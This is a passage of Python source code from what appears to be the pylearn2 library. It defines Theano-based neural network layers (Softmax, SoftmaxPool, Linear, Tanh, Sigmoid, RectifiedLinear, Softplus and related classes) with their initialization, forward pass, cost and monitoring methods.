raise NotImplementedError()
desired = self.W.get_value().T
ipt = self.desired_space.np_format_as(desired, self.input_space)
rval = Conv2DSpace.convert_numpy(ipt,
self.input_space.axes,
('b', 0, 1, 'c'))
return rval
@wraps(Layer.get_weights)
def get_weights(self):
if not isinstance(self.input_space, VectorSpace):
raise NotImplementedError()
return self.W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
self.W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.needs_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
self.desired_space.validate(state_below)
assert state_below.ndim == 2
if not hasattr(self, 'no_affine'):
self.no_affine = False
if self.no_affine:
Z = state_below
else:
assert self.W.ndim == 2
b = self.b
Z = T.dot(state_below, self.W) + b
if self.non_redundant:
zeros = T.alloc(0., Z.shape[0], 1)
Z = T.concatenate((zeros, Z), axis=1)
rval = T.nnet.softmax(Z)
for value in get_debug_values(rval):
if self.mlp.batch_size is not None:
assert value.shape[0] == self.mlp.batch_size
return rval
def _cost(self, Y, Y_hat):
z = arg_of_softmax(Y_hat)
assert z.ndim == 2
z = z - z.max(axis=1).dimshuffle(0, 'x')
log_prob = z - T.log(T.exp(z).sum(axis=1).dimshuffle(0, 'x'))
# we use sum and not mean because this is really one variable per row
if self._has_binary_target:
# The following code is the equivalent of accessing log_prob by the
# indices in Y, but it is written such that the computation can
# happen on the GPU rather than CPU.
flat_Y = Y.flatten()
flat_Y.name = 'flat_Y'
flat_log_prob = log_prob.flatten()
flat_log_prob.name = 'flat_log_prob'
range_ = T.arange(Y.shape[0])
if self.binary_target_dim > 1:
# because of an error in optimization (local_useless_tile)
# when tiling with (1, 1)
range_ = T.tile(range_.dimshuffle(0, 'x'),
(1, self.binary_target_dim)).flatten()
flat_indices = flat_Y + range_ * self.n_classes
flat_indices.name = 'flat_indices'
log_prob_of = flat_log_prob[flat_indices].reshape(Y.shape, ndim=2)
log_prob_of.name = 'log_prob_of'
else:
log_prob_of = (Y * log_prob)
return log_prob_of
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat).sum(axis=1)
assert log_prob_of.ndim == 1
rval = log_prob_of.mean()
return - rval
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat)
if self._has_binary_target:
flat_Y = Y.flatten()
flat_matrix = T.alloc(0, (Y.shape[0] * log_prob_of.shape[1]))
flat_indices = flat_Y + T.extra_ops.repeat(
T.arange(Y.shape[0]) * log_prob_of.shape[1], Y.shape[1]
)
log_prob_of = T.set_subtensor(flat_matrix[flat_indices], flat_Y)
return -log_prob_of
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
return coeff * T.sqr(self.W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W = self.W
return coeff * abs(W).sum()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.no_affine:
return
if self.max_row_norm is not None:
W = self.W
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
class SoftmaxPool(Layer):
"""
A hidden layer that uses the softmax function to do max pooling over groups
of units. When the pooling size is 1, this reduces to a standard sigmoidal
MLP layer.
Parameters
----------
detector_layer_dim : WRITEME
layer_name : WRITEME
pool_size : WRITEME
irange : WRITEME
sparse_init : WRITEME
sparse_stdev : WRITEME
include_prob : float, optional
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
init_bias : WRITEME
W_lr_scale : WRITEME
b_lr_scale : WRITEME
mask_weights : WRITEME
max_col_norm : WRITEME
"""
def __init__(self,
detector_layer_dim,
layer_name,
pool_size=1,
irange=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_col_norm=None):
super(SoftmaxPool, self).__init__()
self.__dict__.update(locals())
del self.self
self.b = sharedX(np.zeros((self.detector_layer_dim,)) + init_bias,
name=(layer_name + '_b'))
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
if not (self.detector_layer_dim % self.pool_size == 0):
raise ValueError("detector_layer_dim = %d, pool_size = %d. "
"Should be divisible but remainder is %d" %
(self.detector_layer_dim,
self.pool_size,
self.detector_layer_dim % self.pool_size))
self.h_space = VectorSpace(self.detector_layer_dim)
self.pool_layer_dim = self.detector_layer_dim / self.pool_size
self.output_space = VectorSpace(self.pool_layer_dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.detector_layer_dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.detector_layer_dim))
< self.include_prob)
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.detector_layer_dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.detector_layer_dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.detector_layer_dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) +
" but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_col_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
desired_norms = T.clip(col_norms, 0, self.max_col_norm)
updates[W] = updated_W * (desired_norms / (1e-7 + col_norms))
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
return W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
"""
.. todo::
WRITEME
"""
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
total = self.detector_layer_dim
cols = self.pool_size
if cols == 1:
# Let the PatchViewer decide how to arrange the units
# when they're not pooled
raise NotImplementedError()
# When they are pooled, make each pooling unit have one row
rows = total / cols
return rows, cols
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.detector_layer_dim,
self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, **kwargs):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state_below is not None) or (state is not None):
if state is None:
P = self.fprop(state_below)
else:
P = state
if self.pool_size == 1:
vars_and_prefixes = [(P, '')]
else:
vars_and_prefixes = [(P, 'p_')]
for var, prefix in vars_and_prefixes:
v_max = var.max(axis=0)
v_min = var.min(axis=0)
v_mean = var.mean(axis=0)
v_range = v_max - v_min
# max_x.mean_u is "the mean over *u*nits of the max over
# e*x*amples" The x and u are included in the name because
# otherwise its hard to remember which axis is which when
# reading the monitor I use inner.outer rather than
# outer_of_inner or something like that because I want
# mean_x.* to appear next to each other in the alphabetical
# list, as these are commonly plotted together
for key, val in [('max_x.max_u', v_max.max()),
('max_x.mean_u', v_max.mean()),
('max_x.min_u', v_max.min()),
('min_x.max_u', v_min.max()),
('min_x.mean_u', v_min.mean()),
('min_x.min_u', v_min.min()),
('range_x.max_u', v_range.max()),
('range_x.mean_u', v_range.mean()),
('range_x.min_u', v_range.min()),
('mean_x.max_u', v_mean.max()),
('mean_x.mean_u', v_mean.mean()),
('mean_x.min_u', v_mean.min())]:
rval[prefix + key] = val
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below) + self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
p, h = max_pool_channels(z, self.pool_size)
p.name = self.layer_name + '_p_'
return p
class Linear(Layer):
"""
A "linear model" in machine learning terminology. This would be more
accurately described as an affine model because it adds an offset to
the output as well as doing a matrix multiplication. The output is:
output = T.dot(weights, input) + biases
This class may be used as the output layer of an MLP for regression.
It may also be used as a hidden layer. Most hidden layers classes are
subclasses of this class that add apply a fixed nonlinearity to the
output of the affine transformation provided by this class.
One notable use of this class is to provide "bottleneck" layers.
By using a Linear layer with few hidden units followed by a nonlinear
layer such as RectifiedLinear with many hidden units, one essentially
gets a RectifiedLinear layer with a factored weight matrix, which can
reduce the number of parameters in the model (by making the effective
weight matrix low rank).
Parameters
----------
dim : int
The number of elements in the output of the layer.
layer_name : str
The name of the layer. All layers in an MLP must have a unique name.
irange : WRITEME
istdev : WRITEME
sparse_init : WRITEME
sparse_stdev : WRITEME
include_prob : float
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
Anything that can be broadcasted to a numpy vector.
Provides the initial value of the biases of the model.
When using this class as an output layer (specifically the Linear
class, or subclasses that don't change the output like
LinearGaussian, but not subclasses that change the output, like
Softmax) it can be a good idea to set this to the return value of
the `mean_of_targets` function. This provides the mean value of
all the targets in the training set, so the model is initialized
to a dummy model that predicts the expected value of each output
variable.
W_lr_scale : float, optional
Multiply the learning rate on the weights by this constant.
b_lr_scale : float, optional
Multiply the learning rate on the biases by this constant.
mask_weights : ndarray, optional
If provided, the weights will be multiplied by this mask after each
learning update.
max_row_norm : WRITEME
max_col_norm : WRITEME
min_col_norm : WRITEME
copy_input : REMOVED
use_abs_loss : bool, optional
If True, the cost function will be mean absolute error rather
than mean squared error.
You can think of mean squared error as fitting a Gaussian
distribution with variance 1, or as learning to predict the mean
of the data.
You can think of mean absolute error as fitting a Laplace
distribution with variance 1, or as learning to predict the
median of the data.
use_bias : bool, optional
If False, does not add the bias term to the output.
"""
def __init__(self,
dim,
layer_name,
irange=None,
istdev=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_row_norm=None,
max_col_norm=None,
min_col_norm=None,
copy_input=None,
use_abs_loss=False,
use_bias=True):
if copy_input is not None:
raise AssertionError(
"The copy_input option had a bug and has "
"been removed from the library.")
super(Linear, self).__init__()
if use_bias and init_bias is None:
init_bias = 0.
self.__dict__.update(locals())
del self.self
if use_bias:
self.b = sharedX(np.zeros((self.dim,)) + init_bias,
name=(layer_name + '_b'))
else:
assert b_lr_scale is None
init_bias is None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
self.output_space = VectorSpace(self.dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.dim))
< self.include_prob)
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, self.dim) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) + " but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_row_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
if self.max_col_norm is not None or self.min_col_norm is not None:
assert self.max_row_norm is None
if self.max_col_norm is not None:
max_col_norm = self.max_col_norm
if self.min_col_norm is None:
self.min_col_norm = 0
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
if self.max_col_norm is None:
max_col_norm = col_norms.max()
desired_norms = T.clip(col_norms,
self.min_col_norm,
max_col_norm)
updates[W] = updated_W * desired_norms / (1e-7 + col_norms)
@wraps(Layer.get_params)
def get_params(self):
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
if self.use_bias:
assert self.b.name is not None
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.get_value()
return W
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
"""
.. todo::
WRITEME
"""
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.dim, self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state is not None) or (state_below is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def _linear_part(self, state_below):
"""
Parameters
----------
state_below : member of input_space
Returns
-------
output : theano matrix
Affine transformation of state_below
"""
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below)
if self.use_bias:
z += self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
return z
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.cost_from_cost_matrix(self.cost_matrix(Y, Y_hat))
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return cost_matrix.sum(axis=1).mean()
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
if(self.use_abs_loss):
return T.abs_(Y - Y_hat)
else:
return T.sqr(Y - Y_hat)
class Tanh(Linear):
"""
A layer that performs an affine transformation of its (vectorial)
input followed by a hyperbolic tangent elementwise nonlinearity.
Parameters
----------
kwargs : dict
Keyword arguments to pass through to `Linear` class constructor.
"""
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.tanh(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Sigmoid(Linear):
"""
A layer that performs an affine transformation of its
input followed by a logistic sigmoid elementwise nonlinearity.
Parameters
----------
monitor_style : string
Values can be any of ['detection', 'one_hot_class',
'bit_vector_class']
'detection' is the default.
- 'detection' : get_monitor_from_state makes no assumptions about
target, reports info about how good model is at
detecting positive bits.
This will monitor precision, recall, and F1 score
based on a detection threshold of 0.5. Note that
these quantities are computed *per-minibatch* and
averaged together. Unless your entire monitoring
dataset fits in one minibatch, this is not the same
as the true F1 score, etc., and will usually
seriously overestimate your performance.
- 'one_hot_class' : get_monitor_from_state assumes target is
one-hot class indicator, even though you're training the
model as k independent sigmoids. Gives info on how
good the argmax over the sigmoids behaves as a classifier.
- 'bit_vector_class' : get_monitor_from_state treats each
sigmoid as predicting a 1 iff its value is > 0.5. Each
example is counted as correct iff all of the bits in its
target are predicted correctly.
This includes as a special case the situation where the
target is a single 0 or 1 label.
- 'classification' : deprecated; originally this string was
used for 'one_hot_class', then due to a miscommunication
it was changed to be used for 'bit_vector_class'.
kwargs : dict
Passed through to the Layer class constructor
"""
def __init__(self, monitor_style='detection', **kwargs):
super(Sigmoid, self).__init__(**kwargs)
if monitor_style == 'classification':
monitor_style = 'bit_vector_class'
warnings.warn("The 'classification' monitor style is deprecated."
" Switch to 'bit_vector_class' (or possibly"
" 'one_hot_class' if your code predates 8f4b62b3df)."
" 'classification' may be removed on or after "
"2015-04-21.")
assert monitor_style in ['one_hot_class', 'bit_vector_class',
'detection']
self.monitor_style = monitor_style
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.sigmoid(p)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
"""
Returns a batch (vector) of
mean across units of KL divergence for each example.
Parameters
----------
Y : theano.gof.Variable
Targets
Y_hat : theano.gof.Variable
Output of `fprop`
mean across units, mean across batch of KL divergence
Notes
-----
Uses KL(P || Q) where P is defined by Y and Q is defined by Y_hat
Currently Y must be purely binary. If it's not, you'll still
get the right gradient, but the value in the monitoring channel
will be wrong.
Y_hat must be generated by fprop, i.e., it must be a symbolic
sigmoid.
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
total = self.kl(Y=Y, Y_hat=Y_hat)
ave = total.mean()
return ave
def kl(self, Y, Y_hat):
"""
Computes the KL divergence.
Parameters
----------
Y : Variable
targets for the sigmoid outputs. Currently Y must be purely binary.
If it's not, you'll still get the right gradient, but the
value in the monitoring channel will be wrong.
Y_hat : Variable
predictions made by the sigmoid layer. Y_hat must be generated by
fprop, i.e., it must be a symbolic sigmoid.
Returns
-------
ave : Variable
average kl divergence between Y and Y_hat.
Notes
-----
Warning: This function expects a sigmoid nonlinearity in the
output layer and it uses kl function under pylearn2/expr/nnet/.
Returns a batch (vector) of mean across units of KL
divergence for each example,
KL(P || Q) where P is defined by Y and Q is defined by Y_hat:
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
batch_axis = self.output_space.get_batch_axis()
div = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
return div
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
rval = elemwise_kl(Y, Y_hat)
assert rval.ndim == 2
return rval
def get_detection_channels_from_state(self, state, target):
"""
Returns monitoring channels when using the layer to do detection
of binary events.
Parameters
----------
state : theano.gof.Variable
Output of `fprop`
target : theano.gof.Variable
The targets from the dataset
Returns
-------
channels : OrderedDict
Dictionary mapping channel names to Theano channel values.
"""
rval = OrderedDict()
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = self.cost(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=0)
fp = ((1 - y) * y_hat).sum(axis=0)
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(Sigmoid, self).get_layer_monitoring_channels(
state=state, targets=targets)
if (targets is not None) and \
((state_below is not None) or (state is not None)):
if state is None:
state = self.fprop(state_below)
if self.monitor_style == 'detection':
rval.update(self.get_detection_channels_from_state(state,
targets))
elif self.monitor_style == 'one_hot_class':
# For this monitor style, we know (by assumption) that
# exactly one bit is always on, so we pick
# the single most likely bit under the model, regardless
# of whether its probability exceeds 0.5
prediction = state.argmax(axis=1)
labels = targets.argmax(axis=1)
incorrect = T.neq(prediction, labels)
misclass = T.cast(incorrect, config.floatX).mean()
rval['misclass'] = misclass
else:
assert self.monitor_style == 'bit_vector_class'
# Threshold Y_hat at 0.5.
prediction = T.gt(state, 0.5)
# If even one feature is wrong for a given training example,
# it's considered incorrect, so we max over columns.
incorrect = T.neq(targets, prediction).max(axis=1)
rval['misclass'] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifiedLinear(Linear):
"""
Rectified linear MLP layer (Glorot and Bengio 2011).
Parameters
----------
left_slope : float
The slope the line should have left of 0.
kwargs : dict
Keyword arguments to pass to `Linear` class constructor.
"""
def __init__(self, left_slope=0.0, **kwargs):
super(RectifiedLinear, self).__init__(**kwargs)
self.left_slope = left_slope
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
# Original: p = p * (p > 0.) + self.left_slope * p * (p < 0.)
# T.switch is faster.
# For details, see benchmarks in
# pylearn2/scripts/benchmark/time_relu.py
p = T.switch(p > 0., p, self.left_slope * p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Softplus(Linear):
"""
An MLP layer using the softplus nonlinearity
h = log(1 + exp(Wx + b))
Parameters
----------
kwargs : dict
Keyword arguments to `Linear` constructor.
"""
def __init__(self, **kwargs):
super(Softplus, self).__init__(**kwargs)
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.softplus(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class SpaceConverter(Layer):
"""
A Layer with no parameters that converts the input from
one space to another.
Parameters
----------
layer_name : str
Name of the layer.
output_space : Space
The space to convert to.
"""
def __init__(self, layer_name, output_space):
super(SpaceConverter, self).__init__()
self.__dict__.update(locals())
del self.self
self._params = []
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.input_space.format_as(state_below, self.output_space)
class ConvNonlinearity(object):
"""
Abstract convolutional nonlinearity class.
"""
def apply(self, linear_response):
"""
Applies the nonlinearity over the convolutional layer.
Parameters
----------
linear_response: Variable
linear response of the layer.
Returns
-------
p: Variable
the response of the layer after the activation function
is applied over.
"""
p = linear_response
return p
def _get_monitoring_channels_for_activations(self, state):
"""
Computes the monitoring channels which does not require targets.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = OrderedDict({})
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
"""
Override the default get_monitoring_channels_from_state function.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
target : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
cost_fn : theano computational graph or None
This is the theano computational graph of a cost function.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
